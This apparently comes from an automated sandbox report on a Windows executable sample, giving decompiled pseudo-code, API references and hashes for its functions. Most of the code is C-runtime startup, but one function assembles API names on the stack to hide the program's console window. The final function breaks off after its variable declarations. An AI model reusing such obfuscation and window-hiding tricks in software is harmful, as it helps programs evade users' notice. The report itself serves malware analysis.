				_t25 = _t8 & 0x000000ff;
				 *0x40cf6c = _t25;
				 *0x40cf68 = _t25 << 8;
				 *0x40cf64 = _t8 >> 0x10;
				if(E00403DD2(_t25 << 8, 1) == 0) {
					E00402793(0x1c);
				}
				if(E0040324C() == 0) {
					E00402793(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E00403AA1(); // executed
				 *0x40d658 = GetCommandLineA();
				 *0x40cf54 = E0040396F();
				E00403722();
				E00403669();
				E004033D1();
				_t18 =  *0x40cf80; // 0x2291150
				 *0x40cf84 = _t18;
				_push(_t18);
				_push( *0x40cf78);
				_v32 = E00402210( *0x40cf74);
				E004033FE(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E004034F1(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}

0x0040267e
0x00402681
0x00402683
0x00402688
0x00402693
0x00402694
0x004026a0
0x004026a1
0x004026a4
0x004026ae
0x004026b6
0x004026bc
0x004026c7
0x004026d0
0x004026df
0x004026e3
0x004026e8
0x004026f0
0x004026f4
0x004026f9
0x004026fa
0x004026fe
0x00402709
0x00402713
0x00402718
0x0040271d
0x00402722
0x00402727
0x0040272c
0x00402731
0x00402732
0x00402746
0x0040274a
0x00402756
0x00402762

APIs

GetVersion.KERNEL32 ref: 004026A4

Part of subcall function 00403DD2: HeapCreate.KERNELBASE(00000000,00001000,00000000,004026DC,00000001), ref: 00403DE3
Part of subcall function 00403DD2: HeapDestroy.KERNEL32 ref: 00403E22

GetCommandLineA.KERNEL32 ref: 00402703

Part of subcall function 00402793: ExitProcess.KERNEL32 ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitLineProcessVersion
String ID:
API String ID: 1387771204-0
Opcode ID: cdbf96e081b01a7d6bd9d8a0d3451e8e86eb29aef74759af5c3b537a322f530d
Instruction ID: 569479402dad0df0017eca00dd20da1a283206a5241b0072165a3600902a2096
Opcode Fuzzy Hash: cdbf96e081b01a7d6bd9d8a0d3451e8e86eb29aef74759af5c3b537a322f530d
Instruction Fuzzy Hash: 2721A4B0940601DFD704BF76DE46B293B69EB08705F10063EF801B62E1DE7D45008B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004053B0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053B0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040536A); // executed
				 *0x40d120 = _t1;
				return _t1;
			}

0x004053b5
0x004053bb
0x004053c0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000536A), ref: 004053B5

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 627b88ac86c256a7c4a48b6754f24b6e2fee30d234351372c5d77ecc9702302b
Instruction ID: c601f6833b7545682c4954244099f4cccc76edc48f8a1764b0b9f8477c52ef2f
Opcode Fuzzy Hash: 627b88ac86c256a7c4a48b6754f24b6e2fee30d234351372c5d77ecc9702302b
Instruction Fuzzy Hash: 10A001B4941640CAD6005FA0AA095167A60B648642715827AA881B52A4DFB500189A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004053C2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 004053C7

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction ID: d332188bd55615930e72a30cb54faed210c9574330ed5165572dacab72e8a7a4
Opcode Fuzzy Hash: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401ED0() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				_Unknown_base(*)()* _t11;
				intOrPtr* _t12;
				void* _t14;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;

				_t16 =  *0x40cf50; // 0x745c0000
				_v32 = 0x776f6853;
				_v28 = 0x646e6957;
				_v24 = 0x776f;
				_t11 = GetProcAddress(_t16,  &_v32);
				_t4 =  &_v20; // 0x646e6957
				_t18 = _t11;
				_v20 = 0x43746547;
				_v16 = 0x6f736e6f;
				_v12 = 0x6957656c;
				_v8 = 0x776f646e;
				_v4 = 0;
				_t12 = E00401000(_t4);
				if(_t12 != 0) {
					_t14 =  *_t12(); // executed
					if(_t14 != 0) {
						 *_t18(_t14, 0); // executed
					}
				}
				return 0;
			}

0x00401ed3
0x00401ee0
0x00401ee8
0x00401ef0
0x00401ef8
0x00401efe
0x00401f02
0x00401f05
0x00401f0d
0x00401f15
0x00401f1d
0x00401f25
0x00401f2d
0x00401f37
0x00401f39
0x00401f3d
0x00401f42
0x00401f42
0x00401f3d
0x00401f4a

APIs

GetProcAddress.KERNEL32 ref: 00401EF8

Part of subcall function 00401000: LoadLibraryA.KERNEL32(73B60000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
Part of subcall function 00401000: GetProcAddress.KERNEL32(73B60000,?), ref: 0040103A

GetConsoleWindow.KERNELBASE ref: 00401F39

Strings

ndow, xrefs: 00401F1D
leWi, xrefs: 00401F15
Show, xrefs: 00401EE0
WindShow, xrefs: 00401EFE, 00401F04
onso, xrefs: 00401F0D

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ConsoleLibraryLoadWindow
String ID: Show$WindShow$leWi$ndow$onso
API String ID: 3244098602-3304525419
Opcode ID: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction ID: 7c2929fdc0435c11f451e5eae0e96c8988408f82577c475e854d6584631a204a
Opcode Fuzzy Hash: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction Fuzzy Hash: F3F0FFB040C3439BE710DF55994575BBBE4BF84748F00491CF498A6298E734D608CFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00403AA1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00403AA1() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E004028A0(0x480);
				if(_t89 == 0) {
					E0040276E(0x1b);
				}
				 *0x40d540 = _t89;
				 *0x40d640 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x40d540; // 0x2290630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x40d540; // 0x2290630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x40d640);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x40d640 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x40d540[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x40d544;
					while(1) {
						_t69 = E004028A0(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x40d640 =  *0x40d640 + 0x20;
						__eflags =  *0x40d640;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x40d640 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x40d640; // 0x20
					goto L18;
				}
			}

0x00403ab4
0x00403ab9
0x00403abd
0x00403ac2
0x00403ac3
0x00403ac9
0x00403ad3
0x00403ad3
0x00403ad9
0x00403add
0x00403ae1
0x00403ae4
0x00403ae8
0x00403aec
0x00403af1
0x00403af4
0x00403af4
0x00403aff
0x00403b05
0x00403b0a
0x00403be1
0x00403be1
0x00403be1
0x00403be3
0x00403be3
0x00403be9
0x00403bec
0x00403bf0
0x00403bf3
0x00403c42
0x00403c42
0x00403c42
0x00000000
0x00403c42
0x00403bf5
0x00403bf7
0x00403bfb
0x00403c07
0x00403c09
0x00403c09
0x00403bfd
0x00403bff
0x00403bff
0x00403c13
0x00403c15
0x00403c18
0x00403c31
0x00403c31
0x00403c1a
0x00403c1b
0x00403c21
0x00403c23
0x00000000
0x00000000
0x00403c25
0x00403c2a
0x00403c2c
0x00403c2f
0x00403c37
0x00403c3a
0x00403c3c
0x00403c3c
0x00000000
0x00403c3a
0x00000000
0x00403c2f
0x00403c46
0x00403c46
0x00403c47
0x00403c47
0x00403c5c
0x00403c5c
0x00403b10
0x00403b13
0x00403b15
0x00000000
0x00000000
0x00403b1b
0x00403b1d
0x00403b23
0x00403b2b
0x00403b2d
0x00403b2f
0x00403b2f
0x00403b31
0x00403b37
0x00403b8f
0x00403b8f
0x00403b91
0x00403b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00403b95
0x00403b95
0x00403b98
0x00403b9a
0x00403b9d
0x00000000
0x00000000
0x00403b9f
0x00403ba1
0x00403ba3
0x00000000
0x00000000
0x00403ba5
0x00403ba7
0x00403bb4
0x00403bbb
0x00403bbb
0x00403bc8
0x00403bd0
0x00403bd4
0x00000000
0x00403bd4
0x00403baa
0x00403bb0
0x00403bb2
0x00000000
0x00000000
0x00000000
0x00403bd7
0x00403bd7
0x00403bdb
0x00403bdc
0x00403bdd
0x00403bdd
0x00000000
0x00403b39
0x00403b39
0x00403b3e
0x00403b43
0x00403b48
0x00403b4b
0x00000000
0x00000000
0x00403b4d
0x00403b4d
0x00403b54
0x00403b56
0x00403b56
0x00403b5c
0x00403b5c
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b64
0x00403b67
0x00403b6b
0x00403b71
0x00403b74
0x00403b74
0x00403b7c
0x00403b7f
0x00403b85
0x00000000
0x00000000
0x00000000
0x00403b87
0x00403b89
0x00000000
0x00403b89

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403AFF
GetFileType.KERNEL32(00000480), ref: 00403BAA
GetStdHandle.KERNEL32(-000000F6), ref: 00403C0D
GetFileType.KERNELBASE(00000000), ref: 00403C1B
SetHandleCount.KERNEL32 ref: 00403C52

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction ID: 0feba543a149a90732486762e9820594143cce74d2de5f228603b0d6f6fd20e8
Opcode Fuzzy Hash: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction Fuzzy Hash: 615149329042118FD7208F68C9847667FF8AB4132DF25467EC596FB2E1DB38EA09C719

Uniqueness

Uniqueness Score: -1.00%

Function 00403420, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00403420(void* __esi, char _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E004034C5();
				_t23 = 1;
				_t27 =  *0x40cfa0 - _t23; // 0x1
				if(_t27 == 0) {
					_t1 =  &_a4; // 0x40274f
					TerminateProcess(GetCurrentProcess(),  *_t1);
				}
				_t16 = _a12;
				 *0x40cf9c = _t23;
				 *0x40cf98 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x40d650; // 0x22904c8
					if(_t9 != 0) {
						_t22 =  *0x40d64c; // 0x22904cc
						_push(_t24);
						_t4 = _t22 - 4; // 0x22904c8
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x40d650; // 0x22904c8
							} while (_t32 >= 0);
						}
					}
					E004034D7(0x40a020, 0x40a024);
				}
				E004034D7(0x40a028, 0x40a030);
				if(_t16 == 0) {
					_t5 =  &_a4; // 0x40274f
					 *0x40cfa0 = _t23; // executed
					ExitProcess( *_t5);
				}
				return E004034CE();
			}

0x00403420
0x00403421
0x00403428
0x00403429
0x0040342f
0x00403431
0x0040343c
0x0040343c
0x00403448
0x0040344c
0x00403452
0x00403458
0x0040345a
0x00403461
0x00403463
0x00403469
0x0040346a
0x0040346a
0x0040346f
0x00403471
0x00403471
0x00403475
0x00403477
0x00403477
0x00403479
0x0040347c
0x0040347c
0x00403471
0x00403484
0x0040348f
0x00403495
0x004034a0
0x004034aa
0x004034b3
0x004034b7
0x004034bd
0x004034bd
0x004034b2

APIs

GetCurrentProcess.KERNEL32(O'@,?,0040340B,00000000,00000000,00000000,0040274F,00000000), ref: 00403435
TerminateProcess.KERNEL32(00000000,?,0040340B,00000000,00000000,00000000,0040274F,00000000), ref: 0040343C
ExitProcess.KERNEL32 ref: 004034BD

Strings

O'@, xrefs: 004034B3, 00403431

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID: O'@
API String ID: 1703294689-681500698
Opcode ID: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction ID: 6ac6280df9b2c45934149a80a540ee9e00ba380f690e92410c80f634368cd1f9
Opcode Fuzzy Hash: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction Fuzzy Hash: 6901D6316043019EDA12AF65FE85A1EBFA9EB40716B10853FF4847B1D0CB3DA984CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403DD2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403DD2(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x40d524 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00403C8A(_t12, _t15);
					 *0x40d528 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E00404BE3();
							goto L5;
						}
					} else {
						_t10 = E0040409C(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x40d524);
							goto L7;
						}
					}
				}
			}

0x00403dd2
0x00403de3
0x00403de9
0x00403deb
0x00403df0
0x00403e28
0x00403e2a
0x00403df2
0x00403df2
0x00403dfa
0x00403dff
0x00403e0e
0x00403e11
0x00000000
0x00403e13
0x00403e13
0x00000000
0x00403e13
0x00403e01
0x00403e06
0x00403e18
0x00403e1a
0x00403e2b
0x00403e2d
0x00403e2e
0x00403e1c
0x00403e22
0x00000000
0x00403e22
0x00403e1a
0x00403dff

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004026DC,00000001), ref: 00403DE3

Part of subcall function 00403C8A: GetVersionExA.KERNEL32 ref: 00403CA9

HeapDestroy.KERNEL32 ref: 00403E22

Part of subcall function 0040409C: HeapAlloc.KERNEL32(00000000,00000140,00403E0B,000003F8), ref: 004040A9

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction ID: 47af9f060beaa7301e025e86c209b90f00c6c47a25b31e9803f9e5dba2807468
Opcode Fuzzy Hash: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction Fuzzy Hash: C5F06571D44302A9EB206FB1DE057363ED99784757F10493BF900F81E0EB788688955E

Uniqueness

Uniqueness Score: -1.00%

Function 004028DE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004028DE(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x408178);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x40d528; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x40c26c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E004052D9(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00404EDB(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E004029A4();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x40d520; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x40d524); // executed
					} else {
						E004052D9(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00404438();
						_v8 = _v8 | 0xffffffff;
						E00402945();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x004028e1
0x004028e3
0x004028e8
0x004028f3
0x004028f4
0x00402901
0x00402909
0x0040294e
0x00402951
0x00000000
0x00402953
0x00402953
0x00402956
0x00402958
0x00402964
0x0040295a
0x0040295a
0x0040295d
0x0040295d
0x00402965
0x00402968
0x0040296e
0x0040299e
0x0040299e
0x00000000
0x00402970
0x00402972
0x00402977
0x00402978
0x0040298b
0x0040298e
0x00402992
0x00402997
0x0040299a
0x0040299c
0x00000000
0x00000000
0x0040299c
0x0040296e
0x0040290b
0x0040290b
0x0040290e
0x00402914
0x004029ad
0x004029ad
0x004029b0
0x004029b2
0x004029b6
0x004029b6
0x004029ba
0x004029ba
0x004029bc
0x004029bd
0x004029bd
0x004029c5
0x0040291a
0x0040291c
0x00402922
0x00402926
0x0040292d
0x00402930
0x00402934
0x00402939
0x0040293e
0x00000000
0x00000000
0x00402940
0x0040293e
0x00402914
0x004029ce
0x004029d9

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 004029C5

Part of subcall function 004052D9: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0040589B,00000009,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 00405316
Part of subcall function 004052D9: EnterCriticalSection.KERNEL32(?,?,?,0040589B,00000009,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 00405331

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 61ade5727045bfb51fc66964740475549272ea74928c6571b4fa07b5045e52eb
Instruction ID: b3198372e80d242cf06e58d27ba1c6f341acb17ecb1f1b3acd74d190493146d8
Opcode Fuzzy Hash: 61ade5727045bfb51fc66964740475549272ea74928c6571b4fa07b5045e52eb
Instruction Fuzzy Hash: 5221CC72B00204ABDB10DF65DE46B9E77A4EB01724F20413BF450F72C0C7BC99418AAD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00401050() {
				char _v40;
				intOrPtr _v48;
				signed int _v60;
				char _v96;
				char _v136;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				WCHAR* _v184;
				char _v196;
				char _v200;
				intOrPtr _v212;
				char _v220;
				intOrPtr _v228;
				char _v240;
				char _v248;
				intOrPtr _v252;
				intOrPtr* _v256;
				void* _v260;
				char _v264;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				intOrPtr* _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				intOrPtr _v332;
				intOrPtr* _v336;
				char _v340;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr* _v388;
				char _v396;
				char _v404;
				signed int _v408;
				signed int _v412;
				char _v420;
				intOrPtr* _v424;
				intOrPtr* _v432;
				char _v440;
				void* _v444;
				intOrPtr* _v452;
				intOrPtr* _v460;
				intOrPtr* _v464;
				intOrPtr* _v468;
				intOrPtr* _v472;
				intOrPtr* _v480;
				intOrPtr* _v492;
				intOrPtr* _v496;
				intOrPtr _t172;
				char* _t174;
				intOrPtr* _t175;
				intOrPtr _t177;
				intOrPtr* _t178;
				intOrPtr _t179;
				void* _t180;
				intOrPtr* _t182;
				intOrPtr* _t186;
				intOrPtr* _t188;
				intOrPtr* _t190;
				intOrPtr* _t195;
				intOrPtr* _t197;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr _t215;
				intOrPtr* _t216;
				intOrPtr* _t220;
				intOrPtr* _t226;
				intOrPtr* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				intOrPtr* _t238;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				void* _t263;
				intOrPtr* _t268;
				signed int _t320;
				signed int _t321;
				intOrPtr _t323;
				void* _t324;
				intOrPtr* _t328;
